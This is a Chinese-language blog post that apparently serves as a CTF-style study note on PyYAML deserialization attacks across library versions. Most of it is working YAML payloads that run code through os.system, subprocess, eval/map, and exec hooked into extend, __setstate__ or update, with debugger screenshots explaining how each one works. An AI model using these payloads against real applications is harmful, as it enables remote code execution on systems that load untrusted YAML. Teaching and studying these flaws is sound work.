<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="一问可能三不知的YAML反序列化  简单介绍  Yaml简介">
<meta property="og:type" content="article">
<meta property="og:title" content="YAML反序列化">
<meta property="og:url" content="https://ayan0.top/2025/09/17/YAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="一问可能三不知的YAML反序列化  简单介绍  Yaml简介">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121114930896.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121172052983.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121172309606.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121173343649.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121231943019.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121232517512.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121232945098.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233129272.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233254825.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233436336.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233600114.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250721144514788.png">
<meta property="article:published_time" content="2025-09-17T07:40:09.000Z">
<meta property="article:modified_time" content="2025-09-17T08:35:35.533Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="YAML">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121114930896.png">


<link rel="canonical" href="https://ayan0.top/2025/09/17/YAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/09/17/YAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/","path":"2025/09/17/YAML反序列化/","title":"YAML反序列化"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>YAML反序列化 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E9%97%AE%E5%8F%AF%E8%83%BD%E4%B8%89%E4%B8%8D%E7%9F%A5%E7%9A%84yaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.</span> <span class="nav-text"> 一问可能三不知的YAML反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text"> 简单介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#yaml%E7%AE%80%E4%BB%8B"><span class="nav-number">1.1.1.</span> <span class="nav-text"> Yaml简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BA%94%E7%94%A8"><span class="nav-number">1.1.2.</span> <span class="nav-text"> 应用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pyyaml"><span class="nav-number">1.2.</span> <span class="nav-text"> PyYAML</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#version51"><span class="nav-number">1.2.1.</span> <span class="nav-text"> version&lt;5.1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#51"><span class="nav-number">1.2.2.</span> <span class="nav-text"> &#x3D;5.1</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#map"><span class="nav-number">1.2.2.1.</span> <span class="nav-text"> map</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#listitems-%E8%A7%A6%E5%8F%91-extend"><span class="nav-number">1.2.2.2.</span> <span class="nav-text"> listitems 触发 extend</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#state%E8%A7%A6%E5%8F%91"><span class="nav-number">1.2.2.3.</span> <span class="nav-text"> state触发</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#update"><span class="nav-number">1.2.2.4.</span> <span class="nav-text"> update</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#version52"><span class="nav-number">1.2.3.</span> <span class="nav-text"> version&gt;&#x3D;5.2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#snakeyaml"><span class="nav-number">1.3.</span> <span class="nav-text"> SnakeYAML</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/09/17/YAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="YAML反序列化 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          YAML反序列化
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-09-17 15:40:09 / 修改时间：16:35:35" itemprop="dateCreated datePublished" datetime="2025-09-17T15:40:09+08:00">2025-09-17</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>9 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="一问可能三不知的yaml反序列化"><a class="markdownIt-Anchor" href="#一问可能三不知的yaml反序列化"></a> 一问可能三不知的YAML反序列化</h1>
<h2 id="简单介绍"><a class="markdownIt-Anchor" href="#简单介绍"></a> 简单介绍</h2>
<h3 id="yaml简介"><a class="markdownIt-Anchor" href="#yaml简介"></a> Yaml简介</h3>
<p>YAML是一种直观的能够被电脑识别的的数据序列化格式，容易被人类阅读，并且容易和脚本语言交互，YAML类似于XML，但是语法比XML简单得多，对于转化成数组或可以hash的数据时是很简单有效的。</p>
<h3 id="应用"><a class="markdownIt-Anchor" href="#应用"></a> 应用</h3>
<p>由于其只是一种数据格式，那么它自然可以在多种语言里大展神威。鉴于主包现在储备有限，目前只能记录一下pyyaml的学习部分，至于Java大概要等之后了。</p>
<h2 id="pyyaml"><a class="markdownIt-Anchor" href="#pyyaml"></a> PyYAML</h2>
<pre><code class="highlight plaintext">pip show pyyaml#查看pyyaml版本</code></pre>
<h3 id="version51"><a class="markdownIt-Anchor" href="#version51"></a> version&lt;5.1</h3>
<p>PyYaml下支持所有yaml标签转化为python对应类型，详见<a target="_blank" rel="noopener" href="https://blog.csdn.net/pythoner/article/details/83389813">Yaml与python类型的对照表</a></p>
<p>其中有五个强大的Complex Python tags支持转化为指定的python模块，类，方法以及对象实例</p>
<table>
<thead>
<tr>
<th>YAML tag</th>
<th>Python tag</th>
</tr>
</thead>
<tbody>
<tr>
<td>!!python/name:module.name</td>
<td><a target="_blank" rel="noopener" href="http://module.name">module.name</a></td>
</tr>
<tr>
<td>!!python/module:package.module</td>
<td>package.module</td>
</tr>
<tr>
<td>!!python/object:module.cls</td>
<td>module.cls instance</td>
</tr>
<tr>
<td>!!python/object/new:module.cls</td>
<td>module.cls instance</td>
</tr>
<tr>
<td>!!python/object/apply:module.f</td>
<td>value of f(…)</td>
</tr>
</tbody>
</table>
<pre><code class="highlight yaml"><span class="type">!!python/object/apply:os.system</span> [<span class="string">&quot;calc.exe&quot;</span>]
<span class="type">!!python/object/new:os.system</span> [<span class="string">&quot;calc.exe&quot;</span>]    
<span class="type">!!python/object/new:subprocess.check_output</span> [[<span class="string">&quot;calc.exe&quot;</span>]]
<span class="type">!!python/object/apply:subprocess.check_output</span> [[<span class="string">&quot;calc.exe&quot;</span>]]</code></pre>
<h3 id="51"><a class="markdownIt-Anchor" href="#51"></a> =5.1</h3>
<p>在 PyYAML &gt;= 5.1 时，开发者就将构造器分为：</p>
<ol>
<li><code>BaseConstructor</code>：没有任何强制类型转换</li>
<li><code>SafeConstructor</code>：只有基础类型的强制类型转换</li>
<li><code>FullConstructor</code>：除了 <code>python/object/apply</code> 之外都支持，但是加载的模块必须位于 <code>sys.modules</code> 中（说明已经主动 import 过了才让加载）。这个是<strong>默认的构造器</strong>。</li>
<li><code>UnsafeConstructor</code>：支持全部的强制类型转换</li>
<li><code>Constructor</code>：等同于 <code>UnsafeConstructor</code></li>
</ol>
<p>那么<code>load</code>时需要主动指定加载器了，否则就会报错 the default Loader is unsafe,默认FullLoader</p>
<p>此时，我们需要增加一个loader请求参数：</p>
<pre><code class="highlight plaintext">import yaml
f = open(&#x27;config.yml&#x27;,&#x27;r&#x27;)
y = yaml.load(f,Loader=yaml.FullLoader)
print(y)
针对不同的需要，加载器有如下几种类型：</code></pre>
<ul>
<li>BaseLoader：仅加载最基本的YAML</li>
<li>SafeLoader：安全地加载YAML语言的子集，建议用于加载不受信任的输入(safe_load）</li>
<li>FullLoader：加载完整的YAML语言,避免任意代码执行,这是当前(PyYAML 5.1)默认加载器调用yaml.load(input) (出警告后)（full_load）</li>
<li>UnsafeLoader(也称为Loader向后兼容性）：原始的Loader代码，可以通过不受信任的数据输入轻松利用（unsafe_load）</li>
</ul>
<p>大概是这样子</p>
<pre><code class="highlight plaintext">from yaml import *
data = b&quot;&quot;&quot;!!python/object/apply:subprocess.Popen
- calc&quot;&quot;&quot;
deserialized_data = load(data, Loader=Loader) # deserializing data
print(deserialized_data)</code></pre>
<p>这样的构造器还有：</p>
<ol>
<li><code>yaml.unsafe_load(exp)</code></li>
<li><code>yaml.unsafe_load_all(exp)</code></li>
<li><code>yaml.load(exp, Loader=UnsafeLoader)</code></li>
<li><code>yaml.load(exp, Loader=Loader)</code></li>
<li><code>yaml.load_all(exp, Loader=UnsafeLoader)</code></li>
<li><code>yaml.load_all(exp, Loader=Loader)</code></li>
</ol>
<p>除了apply之外。还可以利用map来打</p>
<h4 id="map"><a class="markdownIt-Anchor" href="#map"></a> map</h4>
<p>在 python3 中 map 返回的是个<strong>迭代器</strong>，那么可以配合其他函数进行 rce ，比如</p>
<pre><code class="highlight python"><span class="built_in">tuple</span>(<span class="built_in">map</span>(<span class="built_in">eval</span>, [<span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>]))
<span class="comment"># 其中返回的数据类型tuple可以换成list、set、bytes、frozenset都行</span></code></pre>
<pre><code class="highlight plaintext">import yaml

poc = &#x27;&#x27;&#x27;
!!python/object/new:tuple (frozenset/bytes)
- !!python/object/new:map
  - !!python/name:eval
  - [&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;]
&#x27;&#x27;&#x27;
yaml.load(poc)</code></pre>
<h4 id="listitems-触发-extend"><a class="markdownIt-Anchor" href="#listitems-触发-extend"></a> listitems 触发 extend</h4>
<p>从上面的分析可以看出来，我们不需要直接命令执行，只需要满足 触发带参调用 + 引入函数 就能rce</p>
<p>在<code>construct_python_object_apply</code>中看到<img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121114930896.png" alt="image-20250121114930896"></p>
<p>对于 listitems，这里作为参数可以调用前面返回的类里的 extend 方法</p>
<p>那么我们就需要自行构造一个类，实例化后有 extend 方法可以调用</p>
<p>使用 <a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3.13/library/functions.html#type">type()</a> 构造一个 test 类，其中具有 extend 方法，调用 exec</p>
<pre><code class="highlight python"><span class="built_in">type</span>(<span class="string">&quot;test&quot;</span>,<span class="built_in">tuple</span>(),&#123;<span class="string">&quot;extend&quot;</span>:<span class="built_in">exec</span>&#125;)().extend(<span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)</code></pre>
<p>Python</p>
<p>于是可以构造出poc：</p>
<pre><code class="highlight yaml"><span class="type">!!python/object/new:type</span>
<span class="attr">args:</span>
  <span class="bullet">-</span> <span class="string">test</span>
  <span class="bullet">-</span> <span class="type">!!python/tuple</span> []
  <span class="bullet">-</span> &#123;<span class="attr">&quot;extend&quot;:</span> <span class="type">!!python/name:exec</span> &#125;
<span class="attr">listitems:</span> <span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span></code></pre>
<pre><code class="highlight yaml"><span class="comment">#创建了一个类型为z的新对象,而对象中extend属性在创建时会被调用,参数为listitems内的参数</span>
<span class="type">!!python/object/new:type</span>
  <span class="attr">args:</span> [<span class="string">&quot;z&quot;</span>, <span class="type">!!python/tuple</span> [], &#123;<span class="attr">&quot;extend&quot;:</span> <span class="type">!!python/name:exec</span> &#125;]
  <span class="attr">listitems:</span> <span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span></code></pre>
<pre><code class="highlight yaml"><span class="bullet">-</span> <span class="type">!!python/object/new:yaml.MappingNode</span>
  <span class="attr">listitems:</span> <span class="type">!!str</span> <span class="string">&#x27;!!python/object/apply:subprocess.Popen [whoami]&#x27;</span>
  <span class="attr">state:</span>
    <span class="attr">tag:</span> <span class="type">!!str</span> <span class="string">dummy</span>
    <span class="attr">value:</span> <span class="type">!!str</span> <span class="string">dummy</span>
    <span class="attr">extend:</span> <span class="type">!!python/name:yaml.unsafe_load</span>
</code></pre>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121172052983.png" alt></p>
<h4 id="state触发"><a class="markdownIt-Anchor" href="#state触发"></a> state触发</h4>
<p>既然 listitems 可以利用，那么同样作为分支判断其中调用方法的还有 state</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121172309606.png" alt="image-20250121172309606"></p>
<p>跟进 set_python_instance_state</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121173343649.png" alt="image-20250121173343649"></p>
<p><code>__setstate__</code>只需要 instance 里有 <strong>setstate</strong> 就会调用，修改下上面 extend 的 poc 就能用：</p>
<pre><code class="highlight yaml"><span class="type">!!python/object/new:type</span>
<span class="attr">args:</span>
  <span class="bullet">-</span> <span class="string">test</span>
  <span class="bullet">-</span> <span class="type">!!python/tuple</span> []
  <span class="bullet">-</span> &#123;<span class="attr">&quot;__setstate__&quot;:</span> <span class="type">!!python/name:exec</span> &#125;
<span class="attr">state:</span> <span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span></code></pre>
<h4 id="update"><a class="markdownIt-Anchor" href="#update"></a> update</h4>
<p>一开始的想法是打<code>instance.__dict__.update(state)</code>，但是发现 <strong>dict</strong> 好像覆写不掉</p>
<p>那么这里的目标转到<code>slotstate.update(state)</code></p>
<p>要进入这个判断要求类中没有<code>__setstate__</code>方法，没有<code>__dict__</code>属性</p>
<p>这个直接上poc调试了</p>
<pre><code class="highlight yaml"><span class="type">!!python/object/new:str</span>
    <span class="attr">args:</span> []
    <span class="attr">state:</span> <span class="type">!!python/tuple</span>
      <span class="bullet">-</span> <span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>
      <span class="bullet">-</span> <span class="type">!!python/object/new:staticmethod</span>
        <span class="attr">args:</span> []
        <span class="attr">state:</span>
          <span class="attr">update:</span> <span class="type">!!python/name:eval</span>
          <span class="attr">items:</span> <span class="type">!!python/name:list</span></code></pre>
<pre><code class="highlight yaml"><span class="bullet">-</span> <span class="type">!!python/object/new:str</span>
    <span class="attr">args:</span> []
    <span class="attr">state:</span> <span class="type">!!python/tuple</span>
    <span class="bullet">-</span> <span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>
    <span class="bullet">-</span> <span class="type">!!python/object/new:staticmethod</span>
      <span class="attr">args:</span> [<span class="number">0</span>]
      <span class="attr">state:</span>
        <span class="attr">update:</span> <span class="type">!!python/name:exec</span></code></pre>
<p>首先，yaml 解析是从内到外加载的，先加载 !!python/object/new:staticmethod</p>
<p>首次加载</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121231943019.png" alt="image-20250121231943019"></p>
<p>这里会进<code>instance.__dict__.update(state)</code>，因为静态方法所属类一定有 <strong>dict</strong> 属性</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121232517512.png" alt="image-20250121232517512"></p>
<p>经过之后 <code>__dict__</code>中的键值更新</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121232945098.png" alt="image-20250121232945098"></p>
<p>然后是第二轮，加载 !!python/object/new:str</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233129272.png" alt="image-20250121233129272"></p>
<p>此时的 state 第二项就是恶意payload</p>
<p>然后经过<code>state, slotstate = state</code>的解构</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233254825.png" alt="image-20250121233254825"></p>
<p>state 被设置为了我们第一次放入的 state，slotstate 被设置为了我们第二次放入的 state</p>
<p>由于 str 没有<code>__dict__</code>属性，于是会直接触发 <code>slotstate.update(state)</code><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233436336.png" alt="image-20250121233436336"></p>
<p>slotstate.update 此时是 eval，于是rce</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250121233600114.png" alt="image-20250121233600114"></p>
<p>总结一下就是做了这样的一个操作：</p>
<pre><code class="highlight python">a=<span class="built_in">staticmethod</span>(<span class="literal">None</span>)
a.__dict__.update(&#123;<span class="string">&quot;update&quot;</span>:<span class="built_in">eval</span>,<span class="string">&quot;items&quot;</span>:<span class="built_in">list</span>&#125;)
a.update(<span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;</span>)</code></pre>
<h3 id="version52"><a class="markdownIt-Anchor" href="#version52"></a> version&gt;=5.2</h3>
<p>看到的版本现在已经用不了了，会报错:</p>
<pre><code class="highlight plaintext">raise ConstructorError(None, None,
yaml.constructor.ConstructorError: could not determine a constructor for the tag &#x27;tag:yaml.org,2002:python/object/new:str&#x27;
  in &quot;&lt;unicode string&gt;&quot;, line 2, column 3:
    - !!python/object/new:str
      ^</code></pre>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250721144514788.png" alt="image-20250721144514788"></p>
<p>发现在我这个版本(version==6.1)<code>/object/new</code> 的方法已经完全被舍弃了，只能在<code>UnsafeConstructor</code>中看到了</p>
<p>那么利用方法必然要变一下了</p>
<p>后面省了一下，这个地方在5.4就被舍弃掉了。。</p>
<p>而剩余可利用的也只剩下一个<code>name</code>，它相较于5.1时没有太大变化，还是只能引入包而不能进行命令执行</p>
<h2 id="snakeyaml"><a class="markdownIt-Anchor" href="#snakeyaml"></a> SnakeYAML</h2>
<p>java没学，学了再补</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/YAML/" rel="tag"># YAML</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/09/17/Rbash%E9%80%83%E9%80%B8/" rel="prev" title="Rbash逃逸">
                  <i class="fa fa-angle-left"></i> Rbash逃逸
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/09/17/GC%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8/" rel="next" title="GC机制的隐患和利用">
                  GC机制的隐患和利用 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">332k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">10:03</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
